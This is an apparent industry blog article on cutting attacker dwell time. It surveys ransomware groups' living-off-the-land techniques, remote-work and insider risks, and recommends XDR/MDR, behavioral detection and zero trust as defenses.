The cybersecurity industry has a problem. Global spending continues to rise, yet this rise in spending doesn’t correlate with a decrease in breaches. Back in 2015, it took on average 206 days to identify a breach and many more to contain it. Fast forward five years and the situation had greatly improved, with the global median dwell time dropping below one month (24 days) for the first time in 2020 (although the report also noted that it is “likely the preponderance of ransomware that helped drive down the time between initial infection and identification”).
However, 24 days is still plenty of time for threat actors to achieve their objectives. We need to get faster at catching them and evicting them, reducing their dwell time such that it can be measured in hours or minutes, not days.
In order to do that, there needs to be increased focus on the common sources of hidden malicious behavior inside organizations. Let’s explore that and some best practices to mitigate the risk.
In the Firing Line
Commodity, automated attacks are still hugely prevalent. One vendor blocked nearly 63 billion threats last year, for example. But many cybercrime groups have realized that it pays to invest more in sophisticated tooling and targeted threats. A great example is the recent proliferation of ransomware groups like Ryuk and REvil. They increasingly use ‘living off the land’ binaries (LOLBins) — abusing legitimate Windows tools and processes to fly under the radar of anti-malware tools. Lateral movement is often performed with WMI and RDP, network reconnaissance with nltest.exe and net.exe, retrieval of additional tools such as modified versions of Mimikatz and Cobalt Strike using Powershell, and deploying ransomware payloads with the BITS service.
To gain that initial foothold, threat actors have another secret weapon — mass remote working. The pandemic has disrupted security efforts while creating new gaps in protection that they’ve been quick to exploit. These include distracted home workers who may click on links before thinking or remote workers sharing devices and networks with those who engage in risky behavior (flatmates, children, etc.).
The use of remote working infrastructure (e.g., VPNs) and team collaboration apps containing vulnerabilities and the use of remote working tools (e.g., virtual desktop infrastructure) and accounts without strong password protection create additional operational challenges for security teams.
Let’s also not forget that the threat isn’t only from malicious outsiders. Thanks to the financial pressures of the pandemic, and the challenges employers have monitoring remote workers, there are many opportunities and incentives for malign insiders. Recent research revealed that such incidents could cost over $4m per organization annually and takes on average 77 days to contain. One lottery worker in Italy tricked his employer out of €24m ($29m) over several years.
Inefficient offboarding processes, poor password management, and overprivileged identities compound the risks associated with internal and external threats.
A Three-Pronged Strategy
Visibility, context, and control are the name-of-the-game for IT security teams. But it can be a challenge even understanding the size of the organization’s existing endpoint and cloud environment, let alone securing it. Several best practice approaches are worth considering here:
1) An XDR/MDR Approach
Address threat detection and response across different parts of the IT estate in a siloed manner, and you’re likely to miss something. We need to stitch together events across cloud, network and endpoint layers for comprehensive insight — an approach known as Extended Detection and Response (XDR). Managed Detection and Response (MDR) is particularly useful as it effectively outsources all or part of your security operations function to an expert third party. Using tools including XDR, they can support 24/7 threat detection and containment, freeing up time and focus for your in-house security team to get more strategic.
2) Behavioral Analysis
This is no time for relying solely on signatures and static rule-based approaches alone. Your tooling must evolve to adapt to the use of LOLBins and other covert techniques such as lateral movement with stolen credentials. Behavioral detection uses machine learning to baseline normal behavior across both managed and unmanaged devices. The idea is that once trained, it will be able to spot suspicious activity more easily. Enhanced with local business context, such as who are your VIP users and which are your critical devices, it can offer a much-enhanced method of threat detection while improving the effectiveness of incident response efforts.
3) Zero Trust
Another best practice many organizations are increasingly adopting is zero trust — an approach that boils down to “never trust, always verify.” It’s formulated around the idea that you must remove inherent trust from the network, treat it as hostile, and gain confidence that you can trust a connection. Foundational capabilities include risk-based multi-factor authentication (MFA), device profiling, network segmentation, protective monitoring, and more.
This is, of course, not an exhaustive plan, but rather one to help you start thinking about what’s required to mitigate cyber risk in a fast-changing world. The threat landscape is a volatile thing, supported by an underground economy with an annual income measured in trillions today. We need to get smarter about finding and stopping these threat actors — evicting them from our networks quickly. Or we risk inevitable financial and reputational damage.